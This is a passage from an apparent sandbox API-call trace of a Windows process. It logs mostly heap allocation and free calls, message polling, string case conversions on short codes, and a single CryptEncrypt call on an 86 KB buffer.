hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0263.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0263.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0263.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.831] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0263.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.832] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.832] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.832] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0263.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.833] CharLowerBuffW (in: lpsz="byte[86768]", cchLength=0xb | out: lpsz="byte[86768]") returned 0xb [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2100 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0263.833] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0263.836] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20f0 [0263.836] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.836] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.837] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.837] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.837] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20e0 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0263.837] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20e0 [0263.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0263.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.838] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c7548*, pdwDataLen=0x8bef68*=0x152ef, dwBufLen=0x152f0 | out: pbData=0x34c7548*, pdwDataLen=0x8bef68*=0x152f0) returned 1 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2190 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2180 [0263.839] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20f0 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.840] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0263.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0263.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0263.841] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.842] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.842] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.842] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0263.842] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0263.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.842] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0263.842] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.843] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0263.843] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0263.843] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.843] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0263.843] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.843] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0263.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.844] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.844] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.844] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.844] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.844] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.844] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.844] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2160 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0263.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0263.845] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.845] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.845] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.850] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.850] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.850] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.850] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.855] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.855] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.855] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0263.855] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0263.856] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0263.856] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0263.856] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.856] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.856] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.856] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.856] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.857] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.857] 